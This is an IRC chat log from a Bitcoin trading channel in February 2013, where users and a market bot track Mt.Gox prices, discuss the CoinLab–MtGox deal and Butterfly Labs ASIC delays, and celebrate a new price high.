just what i needed to wake up, thanks gribble Feb 27 19:29:44 ;;slap Chaang-Noi Feb 27 19:29:54 :) Feb 27 19:36:01 ;;slap Bicknellski Feb 27 19:36:20 glad he was burly Feb 27 19:39:14 [BTCTC] [MININGCO.ETF] 1 @ 0.57 BTC [-] Feb 27 19:40:59 mod6 maybe you should start a blog Feb 27 19:41:20 hm Feb 27 19:41:38 would someone be writing for bitcoin-assets.com ? Feb 27 19:41:59 or its gonna be preetymuch static. Feb 27 19:44:11 ;;t Feb 27 19:44:13 New crowdfunding platforms let you sell stock in yourself | The Verge Feb 27 19:44:25 O.o Feb 27 19:44:39 ;;web fetch http://bitcoin-assets.com Feb 27 19:44:40 Error: I tried to send you an empty message. Feb 27 19:44:43 :o Feb 27 19:45:03 is not public yet Feb 27 19:48:57 mircea_popescu: wall street deal eminent Feb 27 19:49:47 thestringpuller, wall street deal?.... Feb 27 19:50:38 vaporware Feb 27 19:50:41 i'm waiting for mark to say something on the subject before commenting Feb 27 19:51:15 Bitcoin-assets consensus take : http://www.reddit.com/r/Bitcoin/comments/19boiu/coinlab_bringing_bitcoin_to_wall_street_with/c8mmwbl Feb 27 19:51:24 lol Feb 27 19:51:56 bitcoin is on wall street.... *occupy* wall street.... Feb 27 19:52:00 lol Feb 27 19:52:18 ;;ticker Feb 27 19:52:19 BTCUSD ticker | Best bid: 31.31365, Best ask: 31.41000, Bid-ask spread: 0.09635, Last trade: 31.42000, 24 hour volume: 28018.45963541, 24 hour low: 30.79010, 24 hour high: 31.42000, 24 hour vwap: 31.12569 Feb 27 19:53:07 >$40MM << what is $xMM? Feb 27 19:53:23 :p Feb 27 19:54:00 mt.gox is still tiny Feb 27 19:54:23 the price will close at 42 this month Feb 27 19:54:36 jldklfjs Feb 27 19:54:58 ;;eightball will the price close at 42 this month? Feb 27 19:54:58 You know the answer better than I. Feb 27 19:55:03 ikr^ Feb 27 19:55:15 ^_^ Feb 27 19:56:08 MM is standard for million Feb 27 19:56:24 Bugpowder, oic, i thought it's just 40m Feb 27 19:56:31 which of you assholes has been downvoting my comment. Feb 27 19:57:21 :p Feb 27 19:57:27 if coinlab doesn't roll out a hpc client, they fail Feb 27 19:57:33 their pool hashrate is nil Feb 27 19:57:38 lmao 4 downvotes Feb 27 19:57:42 I only really see MM used as an abbrev for millions in a finance context. Feb 27 19:58:01 "I suspect that coinlab has burnt thru most of their funding without having launched any products, and are now desperately trying to get some press for another funding round before they go under." Feb 27 19:58:15 IN 2011, miners raped coinlab for 95% Feb 27 19:58:28 when the block reward halved, we gamed their PPS until it was unprofitable Feb 27 19:58:33 its 2013 now Feb 27 19:58:34 ohhhh Feb 27 19:58:38 wasnt that 2012 Feb 27 19:58:40 now it's no longer even profitable to mine there Feb 27 19:58:53 even with their bonus PPS Feb 27 19:59:01 I like how the glbse logo Feb 27 19:59:02 that would be a great nugget for the reddit discorse. Feb 27 19:59:06 you lose money mining and their pool hashrate is literally nothing Feb 27 19:59:28 they need to release a client that allows gpou miners to get paid Feb 27 19:59:34 otherwise they are dead Feb 27 20:00:11 2012 kakobrekla Feb 27 20:00:15 u so right Feb 27 20:00:23 hey i know my years. Feb 27 20:00:30 years Feb 27 20:00:34 that's the year the mayans came Feb 27 20:00:37 i'll never forget Feb 27 20:00:47 you mean went? Feb 27 20:01:36 jcpham, yeah, but nobody realized that we all died and the world ended Feb 27 20:01:54 satoshi knows Feb 27 20:02:29 (09:41) < mircea_popescu> mod6 maybe you should start a blog << maybe i do need a new venue for this kinda thing Feb 27 20:02:55 i plan to blog the things one day Feb 27 20:03:09 I'm not much of a writer though. Feb 27 20:03:17 i do not, however, intend to charge people "credits" to simply read my words Feb 27 20:14:56 blog at me bro Feb 27 20:15:33 only thing worse than a blogger is someone planning on blogging Feb 27 20:15:37 jcpham: do you even blog? Feb 27 20:16:34 YOU'RE NOT A WRITER, YOU'RE A KILLER! Feb 27 20:16:54 not really Feb 27 20:17:05 jcph.am is a wordpress blog though Feb 27 20:17:13 you ever see Full Metal Jacket? Feb 27 20:17:24 good show Feb 27 20:20:26 no srsly, MM is NOT standard for mn. Feb 27 20:21:07 but we write MIRRION DORRA Feb 27 20:21:26 jcpham actually bitcoin magazine is quickly becoming a sort of elephant cemetery Feb 27 20:21:28 I blogged once Feb 27 20:21:35 where hype things go to die. Feb 27 20:22:17 I was blogging on geocities when you where crapping in your hands and rubbing it in your face Feb 27 20:22:43 that's unlikely dubsy. Feb 27 20:23:08 dude best gary busey line in a movie ever Feb 27 20:23:32 fuck me it's busey. That's unlikely dubsey* Feb 27 20:23:38 It's not SI, but it is common use in finance. Feb 27 20:24:02 ;;asks 32 Feb 27 20:24:04 There are currently 19178.646 bitcoins offered at or under 32.0 USD, worth 611487.663102 USD in total. Feb 27 20:24:08 shrinkage Feb 27 20:24:09 http://3.bp.blogspot.com/_709-UY_kyd8/SXk9LNp3hZI/AAAAAAAAACc/IvRE5GG9q1g/s400/you-want-mirron-dollar.jpg Feb 27 20:24:22 ;;asks 31.97 Feb 27 20:24:24 There are currently 15678.665 bitcoins offered at or under 31.97 USD, worth 499487.858446 USD in total. Feb 27 20:24:28 dub: http://jcph.am/2013/02/27/do-i-blog/ Feb 27 20:24:39 ;;t Feb 27 20:24:40 do i blog? | jcph.am Feb 27 20:26:28 lol geocities Feb 27 20:27:03 https://www.youtube.com/watch?v=YS_6mR82eQk 0:45 Feb 27 20:27:27 point break is pretty awesome Feb 27 20:28:42 jcpham: you like MiHKAL's latest mix? https://soundcloud.com/mihkal/th-d-ip Feb 27 20:29:28 Bugpowder listening now Feb 27 20:29:32 unfamiliar Feb 27 20:30:00 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [+] Feb 27 20:30:12 i recognize some of the mixes in this set though Feb 27 20:30:14 I love his older mixes. Feb 27 20:30:14 looks like me Feb 27 20:30:27 looks like something i'd rock out to Feb 27 20:31:16 He was more purple music, westcoast midtempo shit with some rapping remix stuff, which sorta presages the latest trap trend really well. Feb 27 20:31:51 [BTCTC] [BTC-BOND] 4 @ 0.01 = 0.04 BTC [+] Feb 27 20:35:57 [BTCTC] [GSDPT] 1 @ 0.00629 BTC [-] Feb 27 20:39:13 4 Feb 27 20:39:26 oh shit. random acts of cat. Feb 27 20:40:21 I'll say it again, fuck. trap. Feb 27 20:41:02 I take better sounding shits Feb 27 20:41:32 o.0 Feb 27 20:49:20 Any idea when asicminer is going to get listed? Feb 27 20:58:19 dunno for sure yet Ed, they give status updates on Thursday, I know they intend to put their own exchange up before dividends are due, Feb 27 20:58:27 but who knows Feb 27 21:06:52 ;;bids 30 Feb 27 21:06:54 There are currently 10156.462 bitcoins demanded at or over 30.0 USD, worth 311026.132877 USD in total. Feb 27 21:18:15 asks are melting Feb 27 21:18:30 6,000 BTC of asks below 32 disappered in the last 2 hours Feb 27 21:28:57 ;;asks 31.97 Feb 27 21:28:59 There are currently 13148.162 bitcoins offered at or under 31.97 USD, worth 418585.522518 USD in total. Feb 27 21:34:07 we goin downtown bitch Feb 27 21:34:42 on the station that plays only platinum hits, if you lickin nuts, double you balls Feb 27 21:43:55 ~1.25 left until next ZIGGAP release on BitFunder Feb 27 21:45:27 https://forums.butterflylabs.com/dbtgallery.php?do=gallery_image&id=588&gal=gallery&type=full Feb 27 21:45:55 BFL are real ! Feb 27 21:46:03 next year ! Feb 27 21:46:04 looks like more unfinished work to me Feb 27 21:46:15 another picture of work that remains to be done Feb 27 21:46:31 many things can go wrong in the bumping process. Feb 27 21:46:53 cant belive they're happy to show a pictures after 9 month Feb 27 21:47:04 It took our project 9 months and a change of vendors to get our chips properly bumped. Feb 27 21:47:06 +10 bug Feb 27 21:47:28 wich one ? Feb 27 21:47:31 It was probably a more complex issue Feb 27 21:47:52 custom silicon probes for chronic in vivo neural recording Feb 27 21:48:02 http://bitbet.us/bitbet_new_asic_pwns_bfl.jpg Feb 27 21:48:04 like its a more 'custom' thing Feb 27 21:48:11 me too! Feb 27 21:48:16 but it still was SUPPOSED to be easy Feb 27 21:48:26 the bumping part that is Feb 27 21:48:32 and the vendor blew it Feb 27 21:50:41 realy curious about all this ! diff, rally if they ship, avalon, etc Feb 27 21:51:04 full of dramaqueen Feb 27 21:51:22 forum ad: Advertisement: I HATE TABLES I HATE TABLES I HA(.°.°... ... TABLES I HATE TABLES I HATE TABLES Feb 27 21:51:37 how much did they pay for that? Feb 27 21:51:40 now its also irc ad. Feb 27 21:52:09 and its not a link in either! Feb 27 21:53:01 *sigh* just came home... was blocking the elevator 10 minutes Feb 27 21:53:40 asicminer was close to 5TH/s last time i looked Feb 27 21:53:53 cuz neighbor convincing me the banks want to crash all existing currencies to create a unified world currency Feb 27 21:54:18 in 10 years. and i couldn't explain to him they will get obsolete by that time Feb 27 21:56:00 i think the united states is the only country interested in unifying the world Feb 27 21:56:18 currency/government/law/whatever Feb 27 21:56:30 wat? Feb 27 21:56:53 illuminati->united states-> united nations-> galactic alliance Feb 27 21:56:59 i think i've made my point Feb 27 21:57:06 ..... Feb 27 21:57:33 i am atlas Feb 27 21:57:42 ;;asks 31.68 Feb 27 21:57:44 There are currently 145.92166 bitcoins offered at or under 31.68 USD, worth 4610.13055542 USD in total. Feb 27 21:58:05 ;;asks 9000 Feb 27 21:58:07 There are currently 79821.88 bitcoins offered at or under 9000.0 USD, worth 7849274.53213 USD in total. Feb 27 21:58:11 lol they end up being bought by romania.. with mircea as president Feb 27 21:58:51 bugpowder ragequit? Feb 27 22:02:45 ;;asks 1000 Feb 27 22:02:47 There are currently 79422.474 bitcoins offered at or under 1000.0 USD, worth 5916315.03342 USD in total. Feb 27 22:38:36 http://www.bizjournals.com/seattle/blog/techflash/2013/02/coinstar-adding-paypal-features-to.html?ana=RSS Feb 27 22:49:10 who runs bitcoin.it wiki Feb 27 22:55:51 what do you think about bet: CoinLab will close or cease bitcoin payments by June ? Feb 27 22:55:56 just putting it together Feb 27 22:56:13 jurov make a deadpool Feb 27 22:56:20 i think there should be deadpool style betting Feb 27 22:57:47 how to apply it to coinlab? Feb 27 22:58:42 DEADPOOL : Coinlab dead by the end of the year. Feb 27 22:58:43 something Feb 27 22:58:57 (they won't die by june, as their burn rate isn't quite enough) Feb 27 23:00:16 Deadpool (Wade Winston Wilson) is a fictional character, a mercenary and anti-hero appearing in comic books published by Marvel Comics. Created by artist Rob Liefeld and writer Fabian Nicieza, Deadpool first appeared in The New Mutants #98 (Feb. 1991). Feb 27 23:00:18 hm? Feb 27 23:01:07 Deadpool now kills btc mining pools? Feb 27 23:05:28 https://www.bitmit.net/en/item/8742-1-gram-silver-trading-card Feb 27 23:05:30 wtf Feb 27 23:07:09 hmm, some sort of app promo thingy. Feb 27 23:07:17 has anyone ever gotten good delivery from bitmit? Feb 27 23:07:34 i haven't used it yet. Feb 27 23:07:51 bet posted, has "nefario clause" too lol Feb 27 23:07:56 for review Feb 27 23:09:19 some issue about the owner Feb 27 23:10:17 if you dont know where you send money for escrow, better to play at satoshi dice Feb 27 23:11:06 so i wait until, they refund all account etc... before risk myself in it Feb 27 23:11:51 shame bc a ebay like with good trust have a HUUUUUUUUUUUGGeeeeeeee potential Feb 27 23:11:53 [BTCTC] [B.YABMC] 1 @ 0.00889 BTC [-] Feb 27 23:12:16 [14:53] what do you think about bet: CoinLab will close or cease bitcoin payments by June ? <-- Did I miss something? Feb 27 23:13:14 they basically don't know what they're doing.. and apparently they cancel orders anytime when mtgox goes up Feb 27 23:13:29 0,o Feb 27 23:13:45 quite a mess... so decided bet may be in good order Feb 27 23:14:00 I was actually talking to an old friend of mine that uses them on an extremely large website Feb 27 23:14:09 whos considering moving over to weex as soon as I make it ready Feb 27 23:15:42 only 364k shares left. https://bitfunder.com/asset/ZigGap Feb 27 23:22:45 oh they're selling at same price as in sunday? Feb 27 23:23:46 nah, 2x more Feb 27 23:23:51 was 0.00005 now its 0.0001 Feb 27 23:26:14 [MPEX] [O.BTCUSD.C370N] 2 @ 0.15307998 = 0.3062 BTC Feb 27 23:28:46 [MPEX] [S.DICE] 51 @ 0.0063799 = 0.3254 BTC [+] Feb 27 23:31:20 thought live.coinbr seized again... but there just wasn't any trade Feb 27 23:31:37 anyone has a clue why? Feb 27 23:32:30 omg ICE seized coinbr.com? ;) Feb 27 23:33:32 there was almost no mpex trade overall, not just coinbr... so it was prolly seized, too :D Feb 27 23:49:33 yeah mpex volume sure has been low Feb 27 23:51:11 SDICE divs are coming up, one whale bought all the MPOE, and BBET has no divs Feb 27 23:51:25 guessing Feb 27 23:53:08 this one is going nicley too Feb 27 23:53:09 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/ Feb 27 23:53:29 1:5 , but a small sample Feb 27 23:54:57 if this goes on theyll get their own category Feb 27 23:57:42 well Feb 27 23:57:45 looking more legit Feb 27 23:59:07 http://coinlab.com/new-transition Feb 27 23:59:25 http://www.reddit.com/r/Bitcoin/comments/19boiu/coinlab_bringing_bitcoin_to_wall_street_with/c8mtykq Feb 28 00:00:54 mtgox has yet to say anything Feb 28 00:01:29 yeah Feb 28 00:01:59 Seems more likely to be real than not. Feb 28 00:02:01 now though Feb 28 00:02:10 also probably bullish Feb 28 00:02:38 just bought back with my gox cash Feb 28 00:02:38 even if mtgox thing materializes, don't necessarily mean they will make it through to the end of the year Feb 28 00:03:06 so does this expose americans to easier gov intervention now? Feb 28 00:03:15 yes Feb 28 00:03:15 referal or not on bitfunder ? Feb 28 00:03:23 easier compliance Feb 28 00:03:25 with FACTA Feb 28 00:04:24 so for example the gov could say, hey coinlab give us a list of all accounts connected to gox, we wanna run some audits Feb 28 00:05:36 it wont even be called gox for americans anymore, heh Feb 28 00:06:16 how many US based gox users sitting with cash in there are going to buy the coins and ship them out before the transfer occurs? Feb 28 00:07:25 will it matter? Feb 28 00:07:33 who knows Feb 28 00:07:40 what will people use instead Feb 28 00:08:00 aethero's thing Feb 28 00:08:05 I'm not sure if I should be happy or pissed. Feb 28 00:08:24 ziggap is all western union stuff Feb 28 00:08:27 fastcash4bitcoins Feb 28 00:08:31 moneygram Feb 28 00:08:33 o, that yea. Feb 28 00:08:34 etc Feb 28 00:09:00 I have a tangible cryptography account already, so I can still purchase from him Feb 28 00:09:25 where is the panic buying? Feb 28 00:09:42 I guess I overestimated the power of a reddit comment. Feb 28 00:09:44 waiting for their gox transfer Feb 28 00:10:20 is using coinlab non-optional for amerifags then? Feb 28 00:10:35 campbx takes dwolla Feb 28 00:10:46 based in GA Feb 28 00:10:52 gox using amerifags I mean Feb 28 00:10:54 dub, it might be optimal Feb 28 00:11:08 there are not a lot of easy options Feb 28 00:11:15 for n00bs Feb 28 00:11:25 in the bitcoin ponzi pyramid Feb 28 00:11:55 reddit has powers now !? **** ENDING LOGGING AT Thu Feb 28 00:16:23 2013 **** BEGIN LOGGING AT Thu Feb 28 00:33:12 2013 Feb 28 00:38:16 wtf does coinbase's platform have aqnything to do with "wall street" Feb 28 00:38:21 *coinlab Feb 28 00:38:42 its in amurica Feb 28 00:40:31 i smell a wallstreet fail Feb 28 00:41:14 [MPEX] [S.DICE] 15199 @ 0.0063799 = 96.9681 BTC [+] Feb 28 00:43:01 'Coinbase brings bitcoin to the Alabama beef jerky co-operative' doesn't have the same ring Feb 28 00:44:17 "coinbase announces they are awitching business models again to improve something that they have no experience in that mtgox with the most experience doesn't like handling" Feb 28 00:44:45 *coinlab Feb 28 00:44:46 heh Feb 28 00:45:27 hmm Feb 28 00:45:57 is this bullish or bearish? Feb 28 00:46:23 [MPEX] [S.DICE] 7 @ 0.0063799 = 0.0447 BTC [+] Feb 28 00:47:13 It's Finance 2.0, bro Feb 28 00:47:34 ,,bc,stats Feb 28 00:48:08 ;;bc,stats Feb 28 00:48:10 Current Blocks: 223486 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 289 blocks | Next Difficulty In About: 1 day, 10 hours, 10 minutes, and 2 seconds | Next Difficulty Estimate: 4415943.46024 | Estimated Percent Change: 20.95123 Feb 28 00:49:25 [BTCTC] [SYNERGY] 6 @ 0.119 = 0.714 BTC [+] Feb 28 00:49:32 20.1% not bad Feb 28 00:50:34 i wonder if asicminer is waiting for the next diff to triple their hashing Feb 28 00:50:54 if that even works Feb 28 00:52:50 http://bitcoinmagazine.com/coinlab-bringing-bitcoin-to-wall-street-with-mtgox-deal Feb 28 00:52:52 wtf Feb 28 00:53:07 story of the day Feb 28 00:53:12 em i ment spam by now. Feb 28 00:53:15 hehe Feb 28 01:05:49 lmao dub Feb 28 01:06:27 im totally going to publish a selection of these quotes. Feb 28 01:11:29 http://mineforeman.com/2013/02/28/butterfly-labs-test-wafer-pictures-and-new-chip-details/ Feb 28 01:11:50 Mhm.. it looks like bathroom tiles, doesn't it? Feb 28 01:12:08 trust us guys.. we really have chips... place your pre-orders! Feb 28 01:15:06 [BTCTC] [BTC-BOND] 109 @ 0.01 = 1.09 BTC [+] Feb 28 01:16:19 [BTCTC] [B.YABMC] 1 @ 0.00879 BTC [-] Feb 28 01:16:21 [BTCTC] [B.YABMC] 4 @ 0.00879 = 0.0352 BTC [-] Feb 28 01:19:58 [MPEX] [S.DICE] 314 @ 0.0063799 = 2.0033 BTC [+] Feb 28 01:22:08 g-line wat Feb 28 01:22:34 oh its a quit Feb 28 01:29:10 ;;ticker Feb 28 01:29:10 BTCUSD ticker | Best bid: 31.23000, Best ask: 31.25000, Bid-ask spread: 0.02000, Last trade: 31.25000, 24 hour volume: 30050.19888954, 24 hour low: 30.79010, 24 hour high: 31.65000, 24 hour vwap: 31.22120 Feb 28 01:30:16 ;;ticker Feb 28 01:30:16 BTCUSD ticker | Best bid: 31.03998, Best ask: 31.24987, Bid-ask spread: 0.20989, Last trade: 31.24987, 24 hour volume: 30267.51838954, 24 hour low: 30.79010, 24 hour high: 31.65000, 24 hour vwap: 31.21999 Feb 28 01:30:50 theres a 20k btc wall Feb 28 01:31:19 i blame coinlab Feb 28 01:31:53 i wonder what the effects of coinlab will be Feb 28 01:32:18 if it hurts btc prices, then i'll buy back cheaper Feb 28 01:33:23 i hope you're sacrcastic, it will have 0 effect Feb 28 01:40:53 http://trilema.com/2013/ycombinator-continues-to-suck-jointly-and-severally/ Feb 28 01:41:11 it's a dramaparty and everyone's quoted. Feb 28 01:45:00 nice Feb 28 01:45:13 i wonder if coinlab is reading Feb 28 01:46:22 that'd require them having a clue. Feb 28 01:46:28 i give it 10:1 against. Feb 28 01:48:43 the PR says that americans wont see mtgox branding anymore Feb 28 01:48:52 itll be all Coinlabbed up Feb 28 01:49:07 BitHub I smell a wallstreet fail. << best comment Feb 28 01:52:17 http://blogs-images.forbes.com/jonmatonis/files/2012/10/coinlab-founders.jpg lefty looks like a dude I know (its not), righty looks like he slipped lefty a roofie and is about to get his rape on Feb 28 01:53:12 hat matching shirt. instarapist Feb 28 01:53:17 lol Feb 28 01:53:23 that photo Feb 28 01:53:47 why would they choose that Feb 28 01:54:00 that hat? Feb 28 01:54:02 "Oh send them that one from the cruise!" Feb 28 01:54:05 photo Feb 28 01:54:08 for the PR Feb 28 01:54:14 This is worse Feb 28 01:54:15 http://coinlab.com/about Feb 28 01:54:23 It is really worrisome Feb 28 01:54:56 they need a new design team Feb 28 01:54:58 [BTCTC] [S.MPOE-PT] 1 @ 0.00072 BTC [+] Feb 28 01:55:20 they have Buy buttons on their home page now, when you click, they ask for your phone number, wtf? Feb 28 01:55:25 [BTCTC] [S.MPOE-PT] 1 @ 0.00072 BTC [+] Feb 28 01:55:45 [BTCTC] [S.MPOE-PT] 3 @ 0.00072 = 0.0022 BTC [+] Feb 28 01:55:58 (15:54) < ThickAsThieves> "Oh send them that one from the cruise!" << lol Feb 28 01:57:26 o mz brady will be thrilled. Feb 28 01:58:03 "Taking You from Zero to Full Stack" Feb 28 01:58:18 that's the lead on their "strategy" page Feb 28 01:58:53 Rent a Petascale Cluster Feb 28 01:58:53 For as little as $80 per hour Feb 28 01:59:30 The Bitcoin network is the largest distributed computation cluster in the world. We help it's members provide their computation ability to the highest bidder. Feb 28 01:59:47 it's ?! Feb 28 01:59:58 what, they compete with hashpower too ? Feb 28 02:00:15 whats going on Feb 28 02:02:13 (15:54) < Bugpowder> It is really worrisome << after reading the about page, I couldn't agree more Feb 28 02:02:22 They have a "Buy $1M" button Feb 28 02:02:22 it worries me if either US or canadian gov't ask for a list of who bought bitcoins when they were cheap Feb 28 02:02:40 assuming butcoins fetch for quite a bit Feb 28 02:02:45 id would be a hassle for me lol Feb 28 02:02:49 so don't use them Feb 28 02:03:22 who is jose canseco Feb 28 02:03:32 former baseball player Feb 28 02:03:49 wheres the buy 1m button Feb 28 02:04:01 a ok Feb 28 02:04:16 really dumb Feb 28 02:04:29 did reality shows after he became a nobody Feb 28 02:04:30 oh i see it Feb 28 02:04:53 theres a sell 1m too Feb 28 02:05:02 im sure the gov Feb 28 02:05:09 would be very interested in it Feb 28 02:06:35 I wonder if they actually have people lined up to buy Feb 28 02:07:17 is there a gribble for how many bitcoins will $1mil get me? Feb 28 02:08:34 ;;market --buy --usd 1000000 Feb 28 02:08:36 A market order to buy 1000000.0000 USD worth of bitcoins right now would buy 30956.035 bitcoins and would take the last price up to 34.3000 USD, resulting in an average price of 32.3039 USD/BTC. Feb 28 02:09:08 not as dramatic as i imagined Feb 28 02:09:27 they have a storage solution page Feb 28 02:09:27 wtf Feb 28 02:09:40 so you pay them money to store your bitcoins Feb 28 02:09:49 sounds like debit cards Feb 28 02:10:08 i guess if youre an investment co, who do you trust with the coins? Feb 28 02:10:23 the IT dept? Feb 28 02:11:52 ;;market --ask --usd 1000000 Feb 28 02:11:53 Error: The "Market" plugin is loaded, but there is no command named "--ask" in it. Try "list Market" to see the commands in the "Market" plugin. Feb 28 02:12:00 ;;market Feb 28 02:12:00 Error: "market" is not a valid command. Feb 28 02:12:06 ;;market --help Feb 28 02:12:07 Error: The "Market" plugin is loaded, but there is no command named "--help" in it. Try "list Market" to see the commands in the "Market" plugin. Feb 28 02:12:13 ;;list Market Feb 28 02:12:13 asks, bids, buy, sell, and ticker Feb 28 02:12:25 ;;market --sell --usd 1000000 Feb 28 02:12:27 A market order to sell 1000000.0000 USD worth of bitcoins right now would sell 34890.485 bitcoins and would take the last price down to 26.7800 USD, resulting in an average price of 28.6611 USD/BTC. Feb 28 02:13:10 whoa Feb 28 02:13:15 indeed. Feb 28 02:13:21 Holy shit Feb 28 02:13:23 we are rising Feb 28 02:13:23 price just raced up Feb 28 02:13:26 ;;ticker Feb 28 02:13:27 BTCUSD ticker | Best bid: 31.22125, Best ask: 31.89000, Bid-ask spread: 0.66875, Last trade: 31.89000, 24 hour volume: 38143.57222950, 24 hour low: 30.79010, 24 hour high: 31.89000, 24 hour vwap: 31.32046 Feb 28 02:13:37 Come on.. just 2 fucking cents Feb 28 02:13:41 and we beat ATH Feb 28 02:13:54 also, DAT spread Feb 28 02:15:48 i predict new high in t-minus 300 seconds Feb 28 02:16:58 ;;ticker Feb 28 02:16:59 BTCUSD ticker | Best bid: 31.35000, Best ask: 31.88000, Bid-ask spread: 0.53000, Last trade: 31.88000, 24 hour volume: 38153.17698435, 24 hour low: 30.79010, 24 hour high: 31.89000, 24 hour vwap: 31.32077 Feb 28 02:17:05 What a tease Feb 28 02:17:28 I was about to take a bite then it got pulled away Feb 28 02:21:31 ;;ticker Feb 28 02:21:32 BTCUSD ticker | Best bid: 31.65000, Best ask: 31.66754, Bid-ask spread: 0.01754, Last trade: 31.63000, 24 hour volume: 38971.49310386, 24 hour low: 30.79010, 24 hour high: 31.89000, 24 hour vwap: 31.33081 Feb 28 02:21:39 i was wrong Feb 28 02:22:54 mp is off congregating with legion of bitcoin whales to deal with siteeation Feb 28 02:23:40 ;;ticker Feb 28 02:23:41 BTCUSD ticker | Best bid: 31.65001, Best ask: 31.66754, Bid-ask spread: 0.01753, Last trade: 31.66754, 24 hour volume: 39018.81424086, 24 hour low: 30.79010, 24 hour high: 31.89000, 24 hour vwap: 31.33168 Feb 28 02:23:50 yeap, we got teased Feb 28 02:32:45 ;;ticker Feb 28 02:32:45 BTCUSD ticker | Best bid: 31.70001, Best ask: 31.76999, Bid-ask spread: 0.06998, Last trade: 31.70001, 24 hour volume: 39398.25969646, 24 hour low: 30.79010, 24 hour high: 31.89000, 24 hour vwap: 31.33667 Feb 28 02:36:15 fuck Feb 28 02:42:41 31.91 Feb 28 02:42:52 .92 Feb 28 02:46:02 .93 Feb 28 02:46:40 32 Feb 28 02:47:00 record broken... Feb 28 02:47:17 ding ding! Feb 28 02:47:18 https://www.youtube.com/watch?v=3GwjfUFyY6M Feb 28 02:47:26 yay! Feb 28 02:47:30 CRASH time Feb 28 02:47:32 :) Feb 28 02:48:02 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Feb 28 02:48:08 ya for sure. Feb 28 02:48:15 crash on the upwards. Feb 28 02:48:24 WOOT Feb 28 02:48:30 Congrats mentlegen! Feb 28 02:48:34 i mean the smart thing is to take down your asks right now Feb 28 02:48:36 Also Adam lost his bet Feb 28 02:48:37 then boom Feb 28 02:51:31 smell 33 Feb 28 02:51:39 so we all just got rich Feb 28 02:51:40 can you? Feb 28 02:51:44 thank you coinlab Feb 28 02:52:07 In a couple years we will look back on this event.. Feb 28 02:52:14 when btc are thousands of dollars each Feb 28 02:52:21 you will try to but you wont remember Feb 28 02:52:27 "lol look at us.. getting excited over a dollar Feb 28 02:52:46 now if Yifu can get his act together.. I want my aSIC Feb 28 02:52:56 ya, a dollar times n is n dollars Feb 28 02:54:09 those little stairs over 31 don't look natural on the orderbook... Feb 28 02:54:34 ;;ticker Feb 28 02:54:36 BTCUSD ticker | Best bid: 32.25125, Best ask: 32.44000, Bid-ask spread: 0.18875, Last trade: 32.44000, 24 hour volume: 52193.36438180, 24 hour low: 30.79010, 24 hour high: 32.44000, 24 hour vwap: 31.50409 Feb 28 02:55:13 We're in all time high zone Feb 28 02:55:20 getting people to sell bitcoins from now on will be a feat. Feb 28 02:55:53 Id prefer to stay in this range for a bit actually Feb 28 02:56:14 i woner how long till 100 Feb 28 02:56:22 a week ? a month ? a year ? a decade >? Feb 28 02:56:44 2 years Feb 28 02:57:04 well no Feb 28 02:57:05 a few days Feb 28 02:57:09 2014 Feb 28 02:57:18 possibly Feb 28 02:58:12 "obama. started term, btc was 1/10000 of a pizza. ended term, 10`000 pizzas bought one btc" Feb 28 02:58:22 down now Feb 28 02:58:38 hm Feb 28 02:58:40 [18:54] Feb28 00:56:46 mtgox x11 165.2808 @ 32.79869778 USD Feb 28 02:58:42 ;) Feb 28 02:58:44 it was actually 10000 btc for 2 pizzas Feb 28 02:58:52 strong bids at 32.7-32.5 Feb 28 02:59:06 mhm nvm Feb 28 02:59:34 get those investors on dice and ill be happuy Feb 28 02:59:48 if they control growth, they'll make a lot more money Feb 28 02:59:48 at this rate ill never run out of euros Feb 28 02:59:56 but wtf. Feb 28 03:00:01 really the market has been being controlled for a week or two now it looked like Feb 28 03:00:24 the slower the rise the more fools will sell Feb 28 03:02:08 i wonder what those ltc people will do now Feb 28 03:02:36 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Feb 28 03:02:38 lol Feb 28 03:02:44 ;;ticker Feb 28 03:02:45 BTCUSD ticker | Best bid: 32.75000, Best ask: 32.80000, Bid-ask spread: 0.05000, Last trade: 32.75000, 24 hour volume: 55524.78325419, 24 hour low: 30.79010, 24 hour high: 32.80000, 24 hour vwap: 31.57837 Feb 28 03:06:22 [MPEX] [O.BTCUSD.P750T] 1000 @ 1.3881316 = 1388.1316 BTC [-] Feb 28 03:08:17 1400 btc of pure profit ? Feb 28 03:08:22 wow some stupid dude complained about my gile Feb 28 03:09:00 I've seen you encouraging someone complaining about his gambling problems to keep gambling Bowjob... Feb 28 03:10:00 hey my math was solid Feb 28 03:11:00 A solid loss for the gambler Feb 28 03:11:34 A solid win for you... Feb 28 03:12:14 http://www.bitcoincharts.com/markets/mtgoxUSD.html Feb 28 03:12:20 That looks... odd Feb 28 03:13:34 guys just a head up, I am satoshi and its time to dump my 500k Feb 28 03:13:56 kthx. Feb 28 03:17:42 yeahhhhh Feb 28 03:18:24 kakobreklaa http://bitbet.us/bet/206/bitcoin-market-cap-above-1-billion-before-end/ Feb 28 03:18:27 2:1 that it's this year. Feb 28 03:18:47 [MPEX] [O.BTCUSD.P750T] 700 @ 1.38433736 = 969.0362 BTC [-] Feb 28 03:19:13 the whale seems to be using a bullish strategy Feb 28 03:20:41 it would be more noble if satoshi refused to own btc due to conflict of interest Feb 28 03:20:52 Satoshi...doesn't...exist Feb 28 03:21:04 Bowjob it's pretty well established he doesn't have much if anything. Feb 28 03:21:37 ;;goxlag Feb 28 03:21:38 30.936965 seconds Feb 28 03:21:41 wowow Feb 28 03:21:52 [MPEX] [O.BTCUSD.C310T] 1000 @ 0.26888574 = 268.8857 BTC [+] Feb 28 03:21:59 wait till it reaches 666.666666 seconds Feb 28 03:22:05 [MPEX] [O.BTCUSD.C330T] 600 @ 0.23935683 = 143.6141 BTC [+] Feb 28 03:25:06 ;;calc (32 - 31)/ 32 Feb 28 03:25:06 0.03125 Feb 28 03:25:10 ;;calc (33 - 31)/ 33 Feb 28 03:25:10 0.0606060606061 Feb 28 03:25:19 ;;calc (42 - 31)/ 42 Feb 28 03:25:19 0.261904761905 Feb 28 03:25:32 lol mircea_popescu some hefty sums Feb 28 03:25:41 ;;calc (42 - 33)/ 42 Feb 28 03:25:41 0.214285714286 Feb 28 03:25:56 bullish position... Feb 28 03:26:04 yeah Feb 28 03:26:16 I've seen better Feb 28 03:26:34 I'm expecting 40 in march Feb 28 03:27:00 80 in april Feb 28 03:27:11 32650 in juptmeber Feb 28 03:27:12 80 might not hit until july Feb 